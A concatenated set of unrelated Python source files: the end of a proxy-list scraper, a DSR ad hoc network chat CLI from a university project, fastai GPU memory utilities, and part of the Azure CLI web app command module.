    workerQueue = Queue.Queue()  # shared by all scraper threads and the writer
    tQueueThread = threading.Thread(target=queueThread)
    tQueueThread.setDaemon(True)
    tProxylist = threading.Thread(target=proxylist)
    tProxylist.setDaemon(True)
    tUsproxy = threading.Thread(target=usproxy)
    tUsproxy.setDaemon(True)
    tFreeproxylist = threading.Thread(target=freeproxylist)
    tFreeproxylist.setDaemon(True)
    tCoolproxy = threading.Thread(target=coolproxy)
    tCoolproxy.setDaemon(True)
    tSamair = threading.Thread(target=samair)
    tSamair.setDaemon(True)
    tProxylisty = threading.Thread(target=proxylisty)
    tProxylisty.setDaemon(True)
    tNntime = threading.Thread(target=nntime)
    tNntime.setDaemon(True)
    tAliveproxy = threading.Thread(target=aliveproxy)
    tAliveproxy.setDaemon(True)
    # Stagger thread starts by half a second each.
    tProxylist.start()
    time.sleep(.500)
    tUsproxy.start()
    time.sleep(.500)
    tFreeproxylist.start()
    time.sleep(.500)
    tCoolproxy.start()
    time.sleep(.500)
    tSamair.start()
    time.sleep(.500)
    tProxylisty.start()
    time.sleep(.500)
    tNntime.start()
    time.sleep(.500)
    tAliveproxy.start()
    time.sleep(2)
    print "\nPlease wait..."
    # Wait for every scraper to finish before writing results.
    tProxylist.join()
    tUsproxy.join()
    tFreeproxylist.join()
    tCoolproxy.join()
    tSamair.join()
    tProxylisty.join()
    tNntime.join()
    tAliveproxy.join()
    if not workerQueue.empty():
        tQueueThread.start()
        tQueueThread.join()
        print "Saved to file!\n"
        print "Proxies found: " + str(proxyCount)
    else:
        print "Could not scrape any proxies!"
    raw_input("\nPress any key to exit...")
    sys.exit()
print "Done" |
linux_network.py | #INSTRUCTIONS
#Run using "python3 linux_network.py <your IP address>"
#The chat application we used during demonstration
#Requires that you create an ad hoc wifi network amoung the nodes using DSR to chat
#You must also know your IP in this network
#Your node ID is the last number in your IP, for example 10.1.1.12 is node ID 12
#==================================README=======================================
#
#This is a DSR protocol implementation using Python.
#
#It is the project for CITS4419 - Mobile and Wireless Computing
#at The University of Western Australia.
#
#<AUTHOR> = Ash Tyndall, Asra Alshabib, Bo Chuen Chung, Dayang Abang Mordian,
# Hui Li Leow, Max Ward, Raphael Byrne, Timothy Raphael,
# Vincent Sun, Zhiqiang (Cody) Qiu
#
#<SUPERVISOR> = Prof. Amitava Datta
#
#<ORGANIZATION> = The University of Western Australia
#
#<YEAR> = 2013
#
#<VERSION> = V1.0
#
#===============================================================================
#=================================BSD LICENSE===================================
#
#Copyright (c) <YEAR>, <AUTHOR>
#
#All rights reserved.
#
#Redistribution and use in source and binary forms, with or without
#modification, are permitted provided that the following conditions
#are met:
#
# - Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# - Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# - Neither the name of the <ORGANIZATION> nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
#THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
#IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
#THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
#PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
#CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
#EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
#PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
#PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
#LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
#NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
#SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
#===============================================================================
import sys
import dsr
import socket
import threading
import time
from datetime import datetime
from dsr_packet import Packet
from route_cache import RouteCache
DSR_PORT = 1069
LOG_BUFFER = []
DSR_TERMINAL_LOG_FLAG = False
TIMESTAMP_FORMAT = '%Y%m%d%H%M%S'
CURRENT_LOG_FILE = ""
RUN_TESTING = False
class Network:
    """UDP broadcast transport used by the DSR layer.

    Sends datagrams on a shared port and collects incoming datagrams (from
    any host other than ourselves) into an in-memory buffer via a background
    daemon thread.
    """
    def __init__(self, ip_address, dsr_port) :
        # ip_address: this node's address on the ad-hoc network;
        # dsr_port: UDP port used by every node for DSR traffic.
        self.ip_address = ip_address
        self.dsr_port = dsr_port
        #parse the IP address, last octet is our id, first 3 are the prefix
        tokens = ip_address.split(".")
        self.id = tokens[3]
        self.net_prefix = tokens[0] + "." + tokens[1] + "." + tokens[2] + "."
        #setup the socket, allow broadcasts and socket reuse.
        self.send_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.send_socket.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
        self.send_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        #setup sending socket
        self.input_buffer = []  # messages received but not yet handed to the DSR layer
        self.run_flag = threading.Event()  # NOTE(review): set but never checked -- confirm before removing
        self.run_flag.set()
        #setup background thread for serving the socket
        self.server_thread = threading.Thread(target=self.serve_socket)
        self.server_thread.daemon = True
        self.server_thread.start()

    def receive(self) :
        #method to easily clear the receive buffer
        # Returns all buffered messages and resets the buffer.
        # NOTE(review): the swap below is not locked; it relies on the GIL and on
        # the receiver thread appending to whichever list it read -- a message
        # appended between these two statements lands in the returned list.
        ret = self.input_buffer
        #reset the buffer
        self.input_buffer = []
        return ret

    def send(self, msg, addr) :
        # Send `msg` to node id `addr`; DSR uses -1 to mean broadcast.
        #dsr protocol says -1 is a broadcast
        if addr == -1 :
            dst_addr = "255.255.255.255"
        else :
            #append the prefix to create a routeable address.
            dst_addr = self.net_prefix + str(addr)
        #send the data on the UDP socket, force UTF-8 encoding.
        self.send_socket.sendto(bytes(msg,'UTF-8'), (dst_addr, self.dsr_port))

    def serve_socket(self):
        # Background daemon loop: receive datagrams and buffer any that did
        # not originate from this node (broadcasts echo back to the sender).
        self.recv_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.recv_socket.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
        self.recv_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.recv_socket.bind(('0.0.0.0', self.dsr_port))
        while True:
            message, address = self.recv_socket.recvfrom(1024)
            if address[0] != self.ip_address:
                self.input_buffer.append(message.decode(encoding="UTF-8"))
def run_background_updates(dsr, network):
    """Background pump between the DSR engine and the network.

    Runs forever: drains DSR's outbox onto the network, feeds received
    datagrams back into DSR, prints delivered application messages, and
    flushes DSR debug output to the log file (and, when enabled, the
    terminal). Intended to run on a daemon thread.
    """
    global CURRENT_LOG_FILE, LOG_BUFFER, DSR_TERMINAL_LOG_FLAG
    CURRENT_LOG_FILE = "dsr_log_" + str(get_timestamp()) + ".log"
    while True:
        # Send messages on the network that are waiting in the outbox.
        for out_msg, out_addr in dsr.pop_outbox():
            network.send(out_msg, out_addr)
        # Run an update cycle.
        dsr.update()
        # Receive messages from the network input buffer.
        networkInput = network.receive()
        if networkInput != []:
            # Give them to dsr to process, then run another update cycle.
            for m in networkInput:
                dsr.receive_packet(m)
            dsr.update()
        # See if we have any messages for the user; payloads are
        # "<sender>#<text>" strings.
        inbox = dsr.pop_inbox()
        if inbox != []:
            for pkt in inbox:
                app_msg = str(pkt.contents)
                msg_parts = app_msg.split("#")
                log_message("Msg from: " + msg_parts[0] + "> " + msg_parts[1])
        # Debug lines always go to the log file; they are mirrored to the
        # terminal buffer only when terminal debugging is enabled.
        # (Previously the write loop was duplicated in both branches.)
        dsr_debug = dsr.pop_debug_buffer()
        for msg in dsr_debug:
            write_message(msg)
        if DSR_TERMINAL_LOG_FLAG:
            LOG_BUFFER.extend(dsr_debug)
        # Output buffered lines to the terminal and reset the buffer.
        for term_msg in LOG_BUFFER:
            print(term_msg)
        LOG_BUFFER = []
def run_testing(dsr, msg, destinations):
    # Continuous-test loop: while RUN_TESTING stays True, re-send a test
    # message to each destination once per second. Runs on a daemon thread.
    # NOTE(review): the `msg` parameter is never used -- the message text is
    # rebuilt from the module-level `hostname` and `node_id` every iteration;
    # confirm whether callers expect their custom message to be sent.
    global RUN_TESTING
    while RUN_TESTING == True:
        for dst in destinations:
            dsr.send_message(hostname + "#Test Message to " + dst + " from " + str(node_id), dst)
        time.sleep(1)
def print_help():
    """Print the CLI usage summary to the terminal.

    Fixes in the help text itself: "<on/of>" -> "<on/off>", "Enabled" ->
    "Enable", and the `run send` example now shows double quotes, matching
    the parser (the command is split on '"').
    """
    print("Available Commands: ")
    print("-------------------")
    print("show route <id> # Prints the current best route in the cache")
    print("show route-cache # Prints the entire route cache to terminal")
    print("show route-cache <id> # Prints the route cache to terminal for a given destination")
    print("show id # Prints the current node's ID")
    print("run test <id> <id> <id> # sends test message to the following node IDs")
    print('run send "<msg>" <id> # sends a message to a specific ID')
    print("set debug <on/off> # Enable / Disable DSR terminal debugging")
    print("set testing <on/off> # Enable / Disable continuous testing with 'run' command")
    print("help # Prints this help message")
    print("exit # Exit the program")
def log_message(msg):
    # Record `msg` both in the terminal buffer (printed by the background
    # thread) and in the log file.
    global LOG_BUFFER
    LOG_BUFFER.append(msg)
    write_message(msg)
def write_message(msg):
    """Append `msg` to the current log file.

    Uses a context manager so the file handle is closed even if the write
    raises (the original open/write/close left the handle open on failure).
    NOTE(review): no newline is appended, so consecutive messages run
    together in the file -- confirm whether that is intended.
    """
    with open(CURRENT_LOG_FILE, 'a') as log_file:
        log_file.write(msg)
def get_timestamp():
    """Current local time rendered with TIMESTAMP_FORMAT (YYYYMMDDhhmmss)."""
    now = datetime.now()
    return now.strftime(TIMESTAMP_FORMAT)
#main loop
# Entry point: expects this node's own IP address as argv[1].
arg_address = sys.argv[1]
#get the last octet of the IP address supplied
tokens = arg_address.split(".")
#node id as a string
node_id = tokens[3]
# NOTE: this rebinds the name `dsr` from the imported module to a DSR
# instance; the module is no longer reachable after this line.
dsr = dsr.DSR(int(node_id))
network = Network(arg_address, DSR_PORT)
hostname = socket.gethostname()
# Background daemon thread pumps packets between the DSR engine and the network.
background_thread = threading.Thread(target=run_background_updates, args=(dsr, network))
background_thread.daemon = True
background_thread.start()
# Interactive command loop. Each command family ("show", "run", "set") is
# parsed in its own try block so a missing argument token falls through to
# the help text via IndexError.
while True:
    user_input = input("dsr-cli@" + hostname + "> ")
    user_input = user_input.strip()
    write_message("dsr-cli@" + hostname + "> " + user_input)
    input_tokens = user_input.split(" ")
    try:
        if input_tokens[0] == "show":
            if input_tokens[1] == "route":
                route_cache = dsr.get_route_cache()
                shortest_path = route_cache.get_shortest_path(int(input_tokens[2]))
                if shortest_path == None:
                    log_message("Path doesn't exist in cache")
                else:
                    log_message("Shortest Path to node: " + str(input_tokens[2]) + " is " + str(shortest_path))
            if input_tokens[1] == "route-cache":
                route_cache = dsr.get_route_cache()
                if len(input_tokens) == 2:
                    log_message("Current Route Cache: " + str(route_cache.get_edge_list()))
                if len(input_tokens) > 2:
                    try:
                        # NOTE(review): `val` only validates the token as an int;
                        # the lookup below indexes the edge list with the *string*
                        # token -- confirm get_edge_list() is keyed by strings.
                        val = int(input_tokens[2])
                        log_message("Current Route Cache for ID " + str(input_tokens[2]) + ": " + str(route_cache.get_edge_list()[input_tokens[2]]))
                    except ValueError:
                        log_message("Input not a valid node ID")
            if input_tokens[1] == "id":
                log_message("Node ID: " + str(node_id))
    except IndexError:
        print_help()
    try:
        if input_tokens[0] == "run":
            if input_tokens[1] == "test":
                length = len(input_tokens)
                ids_to_send_to = []
                #ensure our input is good.
                try:
                    #not the best, but allows me to check input before processing.
                    for i in range (2, length):
                        val = int(input_tokens[i])
                    for k in range (2, length):
                        dsr.send_message(hostname + "#Test Message to " + input_tokens[k], input_tokens[k])
                        log_message("Send Test message to " + str(input_tokens[k]))
                        ids_to_send_to.append(input_tokens[k])
                    # When continuous testing is enabled, spawn a daemon thread
                    # that keeps re-sending to the collected destinations.
                    if RUN_TESTING == True:
                        msg = hostname + "#Test Message to " + str(input_tokens[k])
                        testing_thread = threading.Thread(target=run_testing, args=(dsr, msg, ids_to_send_to))
                        testing_thread.daemon = True
                        testing_thread.start()
                except ValueError:
                    log_message("Input not a valid node ID")
            if input_tokens[1] == "send":
                # The message body must be wrapped in double quotes:
                #   run send "<msg>" <id>
                quote_tokens = user_input.split('"')
                if len(quote_tokens) != 3:
                    raise IndexError('')
                message = quote_tokens[1]
                dst = quote_tokens[2].strip()
                # Prefix the payload with our hostname as the sender tag.
                message = hostname + "#" + message
                try:
                    val = int(dst)
                    dsr.send_message(message, dst)
                except ValueError:
                    log_message("Input not a valid node ID")
    except IndexError:
        print_help()
    try:
        if input_tokens[0] == "set":
            if input_tokens[1] == "debug":
                if input_tokens[2] == "on":
                    DSR_TERMINAL_LOG_FLAG = True
                    log_message("DSR Debugging enabled")
                elif input_tokens[2] == "off":
                    DSR_TERMINAL_LOG_FLAG = False
                    log_message("DSR Debugging disabled")
                else:
                    log_message("Unsupported input " + str(input_tokens[2]))
            if input_tokens[1] == "testing":
                if input_tokens[2] == "on":
                    RUN_TESTING = True
                if input_tokens[2] == "off":
                    RUN_TESTING = False
        if input_tokens[0] == "help":
            print_help()
        if input_tokens[0] == "exit":
            exit(0)
    except IndexError:
        print_help()
    # Anything that is not a known command family (or a blank line) is reported.
    if input_tokens[0] != "show" and input_tokens[0] != "run" and input_tokens[0] != "set" and input_tokens[0] != "help" and input_tokens[0] != "":
        log_message("Unsupported input '" + str(input_tokens[0]) + "'")
|
mem.py | "Utility functions for memory management"
from ..imports.torch import *
from ..core import *
from ..script import *
from ..utils.env import *
import pynvml, functools, traceback, threading, time
from collections import namedtuple
# True when running under IPython/Jupyter (affects traceback handling below).
IS_IN_IPYTHON = is_in_ipython()
# Record of GPU memory readings; all fields are in MBs.
GPUMemory = namedtuple('GPUMemory', ['total', 'used', 'free'])
have_cuda = 0
if torch.cuda.is_available():
    # Initialize NVML once at import time; the gpu_mem_* helpers below rely
    # on it being ready whenever have_cuda is truthy.
    pynvml.nvmlInit()
    have_cuda = 1
def preload_pytorch():
    """Force CUDA initialization by moving a tiny 1x1 tensor onto the GPU."""
    torch.ones((1, 1)).cuda()
def b2mb(num):
    """Convert a size in bytes to whole megabytes (truncated toward zero)."""
    one_mb = 2 ** 20
    return int(num / one_mb)
def gpu_mem_get(id=None):
    "get total, used and free memory (in MBs) for gpu `id`. if `id` is not passed, currently selected torch device is used"
    # `id` intentionally shadows the builtin; kept for interface compatibility.
    if not have_cuda: return GPUMemory(0, 0, 0)
    if id is None: id = torch.cuda.current_device()
    try:
        handle = pynvml.nvmlDeviceGetHandleByIndex(id)
        info = pynvml.nvmlDeviceGetMemoryInfo(handle)
        return GPUMemory(*(map(b2mb, [info.total, info.used, info.free])))
    except Exception:
        # Was a bare `except:`, which also swallowed SystemExit and
        # KeyboardInterrupt. Any NVML failure still degrades gracefully to
        # an all-zero reading.
        return GPUMemory(0, 0, 0)
def gpu_mem_get_all():
    "get total, used and free memory (in MBs) for each available gpu"
    if not have_cuda:
        return []
    gpu_count = pynvml.nvmlDeviceGetCount()
    return [gpu_mem_get(gpu_id) for gpu_id in range(gpu_count)]
def gpu_mem_get_free_no_cache():
    "get free memory (in MBs) for the currently selected gpu id, after emptying the cache"
    torch.cuda.empty_cache()
    mem = gpu_mem_get()
    return mem.free
def gpu_mem_get_used_no_cache():
    "get used memory (in MBs) for the currently selected gpu id, after emptying the cache"
    torch.cuda.empty_cache()
    mem = gpu_mem_get()
    return mem.used
def gpu_mem_get_used_fast(gpu_handle):
    "get used memory (in MBs) for the currently selected gpu id, w/o emptying the cache, and needing the `gpu_handle` arg"
    mem_info = pynvml.nvmlDeviceGetMemoryInfo(gpu_handle)
    return b2mb(mem_info.used)
def gpu_with_max_free_mem():
    "get [gpu_id, its_free_ram] for the first gpu with highest available RAM"
    readings = gpu_mem_get_all()
    if not readings:
        return None, 0
    free_all = np.array([r.free for r in readings])
    best = np.argmax(free_all)
    return best, free_all[best]
def get_ref_free_exc_info():
    "Free traceback from references to locals() in each frame to avoid circular reference leading to gc.collect() unable to reclaim memory"
    # Local names avoid shadowing the builtin `type` (the original did).
    exc_type, exc_val, exc_tb = sys.exc_info()
    traceback.clear_frames(exc_tb)
    return (exc_type, exc_val, exc_tb)
def gpu_mem_restore(func):
    "Reclaim GPU RAM if CUDA out of memory happened, or execution was interrupted"
    @functools.wraps(func)
    def wrapper(*args, **kwargs):
        # FASTAI_TB_CLEAR_FRAMES overrides the default behavior:
        #   "0" -- never strip traceback frames, "1" -- always strip them.
        tb_clear_frames = os.environ.get('FASTAI_TB_CLEAR_FRAMES', None)
        if not IS_IN_IPYTHON or tb_clear_frames=="0":
            # Outside ipython no lingering traceback keeps tensors alive,
            # so no special handling is needed.
            return func(*args, **kwargs)
        try:
            return func(*args, **kwargs)
        except Exception as e:
            if ("CUDA out of memory" in str(e) or
                "device-side assert triggered" in str(e) or
                tb_clear_frames == "1"):
                # Strip frame locals from the traceback so gc can reclaim the
                # tensors they reference, then re-raise without chained context.
                # Note: `type`/`val` deliberately shadow builtins here;
                # `type(val)` re-wraps the exception instance in its own class.
                type, val, tb = get_ref_free_exc_info() # must!
                gc.collect()
                raise type(val).with_traceback(tb) from None
            else: raise # re-raises the exact last exception
    return wrapper
class gpu_mem_restore_ctx():
    "context manager to reclaim RAM if an exception happened under ipython"
    def __enter__(self): return self
    def __exit__(self, exc_type, exc_val, exc_tb):
        # No exception: nothing to clean up.
        if not exc_val: return True
        # Strip frame locals so gc can free the tensors they reference,
        # then re-raise the exception (wrapped in its own class) without
        # chained context.
        traceback.clear_frames(exc_tb)
        gc.collect()
        raise exc_type(exc_val).with_traceback(exc_tb) from None
class GPUMemTrace():
    "Trace GPU allocated and peak memory usage"
    def __init__(self, silent=False):
        assert torch.cuda.is_available(), "pytorch CUDA is required"
        # NOTE(review): this instance attribute shadows the `silent` *method*
        # below, so `trace.silent(True)` raises TypeError on any instance --
        # one of the two should probably be renamed (interface change, so
        # only flagged here).
        self.silent = silent # quickly turn off printouts from the constructor
    def silent(self, silent=False):
        # Unreachable through normal instance attribute lookup; see the note
        # in __init__.
        self.silent = silent
    def reset(self):
        # Baseline for delta measurements; the peak starts at the baseline.
        self.used_start = gpu_mem_get_used_no_cache()
        self.used_peak = self.used_start
    def start(self):
        # Take a fresh baseline and begin sampling peak usage.
        self.reset()
        self.peak_monitor_start()
    def stop(self):
        self.peak_monitor_stop()
    def __del__(self):
        # Ensure the sampling thread's loop flag is cleared on destruction.
        self.stop()
    def data(self):
        # Return (delta_used, delta_peak) in MBs relative to the baseline.
        # NOTE(review): assumes start()/reset() was called first; otherwise
        # `used_start` is unset and this raises AttributeError.
        self.delta_used = gpu_mem_get_used_no_cache() - self.used_start
        self.delta_peak = self.used_peak - self.used_start
        return (self.delta_used, self.delta_peak)
    def report_n_reset(self, note=''):
        # Print the current deltas, then re-baseline.
        self.report(note)
        self.reset()
    def report(self, note=''):
        "printout used+delta peak, and an optional context note"
        if self.silent: return
        delta_used, delta_peak = self.data()
        if note: note = f": {note}"
        print(f"△used {delta_used}, △peak {delta_peak}{note}")
    def peak_monitor_start(self):
        self.peak_monitoring = True
        # continually sample RAM usage
        peak_monitor_thread = threading.Thread(target=self.peak_monitor_func)
        peak_monitor_thread.daemon = True
        peak_monitor_thread.start()
    def peak_monitor_stop(self):
        # The sampling loop checks this flag after each sample and exits.
        self.peak_monitoring = False
    def peak_monitor_func(self):
        # Daemon-thread loop: sample used memory ~every 1ms and track the max.
        gpu_handle = pynvml.nvmlDeviceGetHandleByIndex(torch.cuda.current_device())
        while True:
            self.used_peak = max(gpu_mem_get_used_fast(gpu_handle), self.used_peak)
            if not self.peak_monitoring: break
            time.sleep(0.001) # 1msec
|
custom.py | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
import threading
import time
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse # pylint: disable=import-error
from six.moves.urllib.request import urlopen # pylint: disable=import-error, ungrouped-imports
from binascii import hexlify
from os import urandom
import json
import ssl
import sys
import OpenSSL.crypto
from fabric import Connection
from knack.prompting import prompt_pass, NoTTYException
from knack.util import CLIError
from knack.log import get_logger
from msrestazure.azure_exceptions import CloudError
from msrestazure.tools import is_valid_resource_id, parse_resource_id
from azure.mgmt.storage import StorageManagementClient
from azure.mgmt.web.models import (Site, SiteConfig, User, AppServicePlan, SiteConfigResource,
SkuDescription, SslState, HostNameBinding, NameValuePair,
BackupRequest, DatabaseBackupSetting, BackupSchedule,
RestoreRequest, FrequencyUnit, Certificate, HostNameSslState,
RampUpRule, UnauthenticatedClientAction, ManagedServiceIdentity,
DeletedAppRestoreRequest, DefaultErrorResponseException,
SnapshotRestoreRequest, SnapshotRecoverySource)
from azure.mgmt.applicationinsights import ApplicationInsightsManagementClient
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.cli.core.commands import LongRunningOperation
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, open_page_in_browser, get_json_object
from .tunnel import TunnelServer
from .vsts_cd_provider import VstsContinuousDeliveryProvider
from ._params import AUTH_TYPES, MULTI_CONTAINER_TYPES, LINUX_RUNTIMES, WINDOWS_RUNTIMES
from ._client_factory import web_client_factory, ex_handler_factory
from ._appservice_utils import _generic_site_operation
from ._create_util import (zip_contents_from_dir, get_runtime_version_details, create_resource_group,
should_create_new_rg, set_location, should_create_new_asp, should_create_new_app,
get_lang_from_content)
from ._constants import (NODE_RUNTIME_NAME, OS_DEFAULT, STATIC_RUNTIME_NAME, PYTHON_RUNTIME_NAME)
logger = get_logger(__name__)
# pylint:disable=no-member,too-many-lines,too-many-locals
# region "Common routines shared with quick-start extensions."
# Please maintain compatibility in both interfaces and functionalities"
def create_webapp(cmd, resource_group_name, name, plan, runtime=None, startup_file=None, # pylint: disable=too-many-statements
                  deployment_container_image_name=None, deployment_source_url=None, deployment_source_branch='master',
                  deployment_local_git=None, multicontainer_config_type=None, multicontainer_config_file=None,
                  tags=None):
    """Create a web app on the given App Service plan.

    The plan decides the OS flavor (linux / windows container / windows);
    runtime, container image, or multicontainer config are applied
    accordingly, then source control or local git deployment is wired up.
    """
    if deployment_source_url and deployment_local_git:
        raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
    client = web_client_factory(cmd.cli_ctx)
    # `plan` may be a full ARM resource id or a bare plan name in this group.
    if is_valid_resource_id(plan):
        parse_result = parse_resource_id(plan)
        plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
    else:
        plan_info = client.app_service_plans.get(resource_group_name, plan)
    if not plan_info:
        raise CLIError("The plan '{}' doesn't exist".format(plan))
    # `reserved` is the SDK's flag for a linux plan.
    is_linux = plan_info.reserved
    node_default_version = '8.11.1'
    location = plan_info.location
    site_config = SiteConfig(app_settings=[])
    webapp_def = Site(location=location, site_config=site_config, server_farm_id=plan_info.id, tags=tags)
    helper = _StackRuntimeHelper(client, linux=is_linux)
    if is_linux:
        # Exactly one of runtime / container image / multicontainer config
        # must be supplied for a linux app.
        if not validate_container_app_create_options(runtime, deployment_container_image_name,
                                                     multicontainer_config_type, multicontainer_config_file):
            raise CLIError("usage error: --runtime | --deployment-container-image-name |"
                           " --multicontainer-config-type TYPE --multicontainer-config-file FILE")
        if startup_file:
            site_config.app_command_line = startup_file
        if runtime:
            site_config.linux_fx_version = runtime
            match = helper.resolve(runtime)
            if not match:
                raise CLIError("Linux Runtime '{}' is not supported."
                               "Please invoke 'list-runtimes' to cross check".format(runtime))
        elif deployment_container_image_name:
            site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
            # Custom-image apps should not mount the shared content storage.
            site_config.app_settings.append(NameValuePair(name="WEBSITES_ENABLE_APP_SERVICE_STORAGE",
                                                          value="false"))
        elif multicontainer_config_type and multicontainer_config_file:
            encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
            site_config.linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
    elif plan_info.is_xenon: # windows container webapp
        site_config.windows_fx_version = _format_fx_version(deployment_container_image_name)
    elif runtime: # windows webapp with runtime specified
        if any([startup_file, deployment_container_image_name, multicontainer_config_file, multicontainer_config_type]):
            raise CLIError("usage error: --startup-file or --deployment-container-image-name or "
                           "--multicontainer-config-type and --multicontainer-config-file is "
                           "only appliable on linux webapp")
        match = helper.resolve(runtime)
        if not match:
            raise CLIError("Runtime '{}' is not supported. Please invoke 'list-runtimes' to cross check".format(runtime)) # pylint: disable=line-too-long
        # The matched stack knows how to apply itself onto the site config.
        match['setter'](match, site_config)
        # Be consistent with portal: any windows webapp should have this even it doesn't have node in the stack
        if not match['displayName'].startswith('node'):
            site_config.app_settings.append(NameValuePair(name="WEBSITE_NODE_DEFAULT_VERSION",
                                                          value=node_default_version))
    else: # windows webapp without runtime specified
        site_config.app_settings.append(NameValuePair(name="WEBSITE_NODE_DEFAULT_VERSION",
                                                      value=node_default_version))
    if site_config.app_settings:
        for setting in site_config.app_settings:
            logger.info('Will set appsetting %s', setting)
    poller = client.web_apps.create_or_update(resource_group_name, name, webapp_def)
    webapp = LongRunningOperation(cmd.cli_ctx)(poller)
    # Ensure SCC operations follow right after the 'create', no precedent appsetting update commands
    _set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url,
                             deployment_source_branch, deployment_local_git)
    _fill_ftp_publishing_url(cmd, webapp, resource_group_name, name)
    return webapp
def validate_container_app_create_options(runtime=None, deployment_container_image_name=None,
                                          multicontainer_config_type=None, multicontainer_config_file=None):
    """Return True when exactly one creation mode was chosen.

    The multicontainer type and file must be supplied together, and only one
    of runtime / container image / multicontainer config may be present.
    """
    if bool(multicontainer_config_type) != bool(multicontainer_config_file):
        return False
    chosen = sum(1 for opt in (runtime, deployment_container_image_name, multicontainer_config_type) if opt)
    return chosen == 1
def update_app_settings(cmd, resource_group_name, name, settings=None, slot=None, slot_settings=None):
    """Create or update app settings.

    Entries in `slot_settings` are additionally recorded as slot-sticky.
    Each entry may be either JSON (including the output of the `list`
    command) or a plain KEY=VALUE string.
    """
    if not settings and not slot_settings:
        raise CLIError('Usage Error: --settings |--slot-settings')
    settings = settings or []
    slot_settings = slot_settings or []
    app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                           'list_application_settings', slot)
    result, slot_result = {}, {}
    # pylint: disable=too-many-nested-blocks
    for src, dest in [(settings, result), (slot_settings, slot_result)]:
        for s in src:
            try:
                temp = shell_safe_json_parse(s)
                if isinstance(temp, list): # a bit messy, but we'd like accept the output of the "list" command
                    for t in temp:
                        # entries default to slot-sticky unless marked otherwise
                        if t.get('slotSetting', True):
                            slot_result[t['name']] = t['value']
                        else:
                            result[t['name']] = t['value']
                else:
                    dest.update(temp)
            except CLIError:
                # not JSON -- fall back to plain KEY=VALUE parsing
                setting_name, value = s.split('=', 1)
                dest[setting_name] = value
    # slot-sticky values win over regular ones on key collisions
    result.update(slot_result)
    for setting_name, value in result.items():
        app_settings.properties[setting_name] = value
    client = web_client_factory(cmd.cli_ctx)
    result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
                                         'update_application_settings',
                                         app_settings.properties, slot, client)
    app_settings_slot_cfg_names = []
    if slot_result:
        # persist the new sticky setting names on the site's slot config
        new_slot_setting_names = slot_result.keys()
        slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
        slot_cfg_names.app_setting_names = slot_cfg_names.app_setting_names or []
        slot_cfg_names.app_setting_names += new_slot_setting_names
        app_settings_slot_cfg_names = slot_cfg_names.app_setting_names
        client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
    return _build_app_settings_output(result.properties, app_settings_slot_cfg_names)
def add_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type, account_name,
                              share_name, access_key, mount_path=None, slot=None, slot_setting=False):
    """Attach a new Azure storage mount to the app under key `custom_id`.

    Fails if `custom_id` is already configured; use the update command for
    existing configurations.
    """
    from azure.mgmt.web.models import AzureStorageInfoValue
    azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                                     'list_azure_storage_accounts', slot)
    if custom_id in azure_storage_accounts.properties:
        raise CLIError("Site already configured with an Azure storage account with the id '{}'. "
                       "Use 'az webapp config storage-account update' to update an existing "
                       "Azure storage account configuration.".format(custom_id))
    azure_storage_accounts.properties[custom_id] = AzureStorageInfoValue(type=storage_type, account_name=account_name,
                                                                         share_name=share_name, access_key=access_key,
                                                                         mount_path=mount_path)
    client = web_client_factory(cmd.cli_ctx)
    result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
                                         'update_azure_storage_accounts', azure_storage_accounts.properties,
                                         slot, client)
    if slot_setting:
        # mark this storage configuration as sticky to the slot
        slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
        slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
        if custom_id not in slot_cfg_names.azure_storage_config_names:
            slot_cfg_names.azure_storage_config_names.append(custom_id)
        client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
    return result.properties
